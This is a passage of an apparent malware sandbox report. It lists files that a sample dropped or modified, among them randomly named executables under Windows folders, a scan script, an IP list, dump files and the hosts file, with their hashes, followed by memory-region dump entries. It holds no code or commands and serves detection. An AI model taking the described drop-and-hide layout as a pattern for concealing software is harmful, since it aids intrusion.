                                                              ccdddf98d7a5c63916b9ef708a2987a3

                                                              SHA1

                                                              5063e02970602cfe04bfd73198eadb2f63ea1ac3

                                                              SHA256

                                                              0010d5c1f19be061cf651294040129547d84bb8658209387a9c1d37d6cfcbd5e

                                                              SHA512

                                                              7ce2af2e939a53804f173fe5177b5f98ba4147fa396f9167576e7ed6aa811592d3f60f191d8fd9c3efa21380e7c315fcdbf8afd6dbb812f39696254e43bd9631

                                                            • C:\Windows\TEMP\qpliatbez\1616.dmp

                                                              Filesize

                                                              3.8MB

                                                              MD5

                                                              e7dc39b222096ecfa6e84262af2b2315

                                                              SHA1

                                                              c18ce4e03e37eb5f97f5a2a0987f691a0fa060ef

                                                              SHA256

                                                              f6a2d163746dc956eaeec846cd506ef19d447ecae051f40e4fc5f0f51b025e15

                                                              SHA512

                                                              3f60afe43c6806561386d2e883ad436f7306ff2b0270e958250bb5947293858d1e6b1b7cb8b1b34b3a911948e4366740075078641b6ed3318c1f533370b626e8

                                                            • C:\Windows\TEMP\qpliatbez\2296.dmp

                                                              Filesize

                                                              851KB

                                                              MD5

                                                              9f9b07f45174d3eb620b18df4f1914a2

                                                              SHA1

                                                              e74db7250afd0e4b5fb8a4e54578e60e157dcd50

                                                              SHA256

                                                              2f20d4785c1d087abc2ba579031ed15d6fb9a5536a109f6f89cd911d0ddabde9

                                                              SHA512

                                                              b6c46ccf99f4fde9fff2998188b5a1a797790238c04bcf64a530e0d224cf779d5a9c9aef308221abd4a8e758f2efba12432050e16d81cfb2974aac1f0c2b6fd3

                                                            • C:\Windows\TEMP\qpliatbez\2392.dmp

                                                              Filesize

                                                              7.2MB

                                                              MD5

                                                              be91f067bc2bc6be3ec6ce1ca0419d40

                                                              SHA1

                                                              33c8b9c8a6a559cca692b094e94ff0413d804a42

                                                              SHA256

                                                              72df4b21f76fd2310ccce1a26eb248e6dccec65a2aa3545bfaaba9a7b6c8d2c0

                                                              SHA512

                                                              df9f7bd47279013eb7f58c2d31ac40200af3c621ab656bc28d65a09ec543bc4ed01ecfbc231a822142f963b5373a57ca7da59efb45740444cc57722389aaf4d3

                                                            • C:\Windows\TEMP\qpliatbez\308.dmp

                                                              Filesize

                                                              4.6MB

                                                              MD5

                                                              ad1e4fcfdfaf3ff53531ede551303834

                                                              SHA1

                                                              3f8d6edf82f8767f8f38fb58b3fdef6e490579f0

                                                              SHA256

                                                              6aa5d49691de6e9982a19d10ad80b102ba298aadef5d9344c5888909911493d8

                                                              SHA512

                                                              b87b61667913e7993bec68c679e6d71eadaf3fb7c0edd891568aac907d0b8eaff44bededdb698d38f93c5f2289944bd3d5a16e6ee5b4c5a4cbb7486d6aa9ce0f

                                                            • C:\Windows\TEMP\yplbrbilk\config.json

                                                              Filesize

                                                              693B

                                                              MD5

                                                              f2d396833af4aea7b9afde89593ca56e

                                                              SHA1

                                                              08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                                              SHA256

                                                              d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                                              SHA512

                                                              2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                                            • C:\Windows\qpliatbez\Corporate\vfshost.exe

                                                              Filesize

                                                              381KB

                                                              MD5

                                                              fd5efccde59e94eec8bb2735aa577b2b

                                                              SHA1

                                                              51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                              SHA256

                                                              441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                              SHA512

                                                              74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                            • C:\Windows\qpliatbez\itbbubukb\ip.txt

                                                              Filesize

                                                              195B

                                                              MD5

                                                              d2795f76d285189244d81192204d165f

                                                              SHA1

                                                              18b6b2ec62e955a4010389e397fb1cd73c94fc8e

                                                              SHA256

                                                              897878550289b1c24a8f2ff44d5cdb01bb82a0c2df583cf76d9898d6f1b36444

                                                              SHA512

                                                              b4dbb89e459a8064cc49852c7f0c3aefc24fb7cb0b1f045156011b95fd6305c017510241ff3b263c55df1ec5da7fa1c465adfe6b57dcac230a2519f0411fa77a

                                                            • C:\Windows\qpliatbez\itbbubukb\jblckupty.exe

                                                              Filesize

                                                              63KB

                                                              MD5

                                                              821ea58e3e9b6539ff0affd40e59f962

                                                              SHA1

                                                              635a301d847f3a2e85f21f7ee12add7692873569

                                                              SHA256

                                                              a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb

                                                              SHA512

                                                              0d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6

                                                            • C:\Windows\qpliatbez\itbbubukb\scan.bat

                                                              Filesize

                                                              159B

                                                              MD5

                                                              db70870473b9caafc9be1e1bcfe12c9d

                                                              SHA1

                                                              f0609e1dde600de368a8fe745fba35b554ea7f6b

                                                              SHA256

                                                              7fb310589a66e1ea91e6391ade855dcec79d62117e5f547d0e2c1d6a010737a8

                                                              SHA512

                                                              abf97ccd8786bf41bf531eae9611276e665794cfecf57bd3dc5c862460486e8570705c92eb7374e279a2bcaa1d48f706baef7d18f1af9fdbf98e4afc373fb2f2

                                                            • C:\Windows\qpliatbez\itbbubukb\wpcap.exe

                                                              Filesize

                                                              424KB

                                                              MD5

                                                              e9c001647c67e12666f27f9984778ad6

                                                              SHA1

                                                              51961af0a52a2cc3ff2c4149f8d7011490051977

                                                              SHA256

                                                              7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                              SHA512

                                                              56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                            • C:\Windows\system32\drivers\etc\hosts

                                                              Filesize

                                                              975B

                                                              MD5

                                                              b5d815ff5310f62de5020591be598bc0

                                                              SHA1

                                                              8013562b0cc2516d16d474308c8982a31b7f5dd0

                                                              SHA256

                                                              a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85

                                                              SHA512

                                                              4e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94

                                                            • \Windows\Temp\nse88B2.tmp\System.dll

                                                              Filesize

                                                              11KB

                                                              MD5

                                                              2ae993a2ffec0c137eb51c8832691bcb

                                                              SHA1

                                                              98e0b37b7c14890f8a599f35678af5e9435906e1

                                                              SHA256

                                                              681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                              SHA512

                                                              2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                            • \Windows\Temp\nse88B2.tmp\nsExec.dll

                                                              Filesize

                                                              6KB

                                                              MD5

                                                              b648c78981c02c434d6a04d4422a6198

                                                              SHA1

                                                              74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                              SHA256

                                                              3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                              SHA512

                                                              219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                            • \Windows\Temp\qpliatbez\ltkelldpt.exe

                                                              Filesize

                                                              126KB

                                                              MD5

                                                              e8d45731654929413d79b3818d6a5011

                                                              SHA1

                                                              23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                              SHA256

                                                              a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                              SHA512

                                                              df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                            • \Windows\Temp\xohudmc.exe

                                                              Filesize

                                                              72KB

                                                              MD5

                                                              cbefa7108d0cf4186cdf3a82d6db80cd

                                                              SHA1

                                                              73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                              SHA256

                                                              7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                              SHA512

                                                              b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                                            • \Windows\Temp\yplbrbilk\jebdql.exe

                                                              Filesize

                                                              343KB

                                                              MD5

                                                              2b4ac7b362261cb3f6f9583751708064

                                                              SHA1

                                                              b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                                              SHA256

                                                              a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                                              SHA512

                                                              c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                                            • \Windows\qpliatbez\itbbubukb\ebhtiljtp.exe

                                                              Filesize

                                                              332KB

                                                              MD5

                                                              ea774c81fe7b5d9708caa278cf3f3c68

                                                              SHA1

                                                              fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                              SHA256

                                                              4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                              SHA512

                                                              7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                            • \Windows\sbbjtutk\tpltztt.exe

                                                              Filesize

                                                              9.2MB

                                                              MD5

                                                              310693543dea15147d64222197f28ec2

                                                              SHA1

                                                              af66cccfdc1593e3a989ea0ed294a6dc501c0bdb

                                                              SHA256

                                                              add53520c51bb36b1e0261b5de3a2f167e42c71ff4e551033f070da4b41b3244

                                                              SHA512

                                                              8fd1201d331ff32ab6f47d0c4fe86f6cd2a3bd60bad0854d9a3c3878b4b4d759aa03aa45cea54ee7bb356c670975ab86ba59764d6b9457f3e4d6405764ca468e

                                                            • memory/768-230-0x000000013F020000-0x000000013F07B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/768-228-0x000000013F020000-0x000000013F07B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/900-285-0x000000013F8C0000-0x000000013F9E0000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/900-284-0x000000013F8C0000-0x000000013F9E0000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/900-170-0x0000000000110000-0x0000000000120000-memory.dmp

                                                              Filesize

                                                              64KB

                                                            • memory/900-250-0x000000013F8C0000-0x000000013F9E0000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/900-235-0x000000013F8C0000-0x000000013F9E0000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/900-354-0x000000013F8C0000-0x000000013F9E0000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/900-232-0x000000013F8C0000-0x000000013F9E0000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/900-233-0x000000013F8C0000-0x000000013F9E0000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/900-168-0x000000013F8C0000-0x000000013F9E0000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/900-205-0x000000013F8C0000-0x000000013F9E0000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/900-234-0x000000013F8C0000-0x000000013F9E0000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/900-190-0x000000013F8C0000-0x000000013F9E0000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/1096-75-0x0000000000480000-0x00000000004CC000-memory.dmp

                                                              Filesize

                                                              304KB

                                                            • memory/1128-204-0x000000013FF50000-0x000000013FFAB000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/1128-207-0x000000013FF50000-0x000000013FFAB000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/1736-148-0x0000000010000000-0x0000000010008000-memory.dmp

                                                              Filesize

                                                              32KB

                                                            • memory/1736-163-0x0000000000400000-0x0000000000412000-memory.dmp

                                                              Filesize

                                                              72KB

                                                            • memory/1804-162-0x000000013FA30000-0x000000013FA8B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/1804-173-0x000000013FA30000-0x000000013FA8B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2148-248-0x0000000001200000-0x0000000001212000-memory.dmp

                                                              Filesize

                                                              72KB

                                                            • memory/2160-9-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                            • memory/2176-182-0x000000013FD30000-0x000000013FD8B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2176-179-0x000000013FD30000-0x000000013FD8B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2348-136-0x000000013F900000-0x000000013F9EE000-memory.dmp

                                                              Filesize

                                                              952KB

                                                            • memory/2348-138-0x000000013F900000-0x000000013F9EE000-memory.dmp

                                                              Filesize

                                                              952KB

                                                            • memory/2512-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                            • memory/2512-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                            • memory/2644-184-0x0000000002130000-0x000000000218B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2644-166-0x0000000002FF0000-0x0000000003110000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/2644-221-0x00000000019B0000-0x0000000001A0B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2644-219-0x00000000011F0000-0x000000000124B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2644-161-0x0000000002130000-0x000000000218B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2644-211-0x00000000019B0000-0x0000000001A0B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2644-177-0x00000000019B0000-0x0000000001A0B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2644-201-0x00000000019B0000-0x0000000001A0B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2644-202-0x00000000019B0000-0x0000000001A0B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2644-188-0x0000000002FF0000-0x0000000003110000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/2724-223-0x000000013F970000-0x000000013F9CB000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2748-197-0x000000013F830000-0x000000013F88B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2748-189-0x000000013F830000-0x000000013F88B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2860-213-0x000000013FB10000-0x000000013FB6B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2860-215-0x000000013FB10000-0x000000013FB6B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                            • memory/2908-134-0x0000000000F90000-0x000000000107E000-memory.dmp

                                                              Filesize

                                                              952KB

                                                            • memory/2908-135-0x0000000000F90000-0x000000000107E000-memory.dmp

                                                              Filesize

                                                              952KB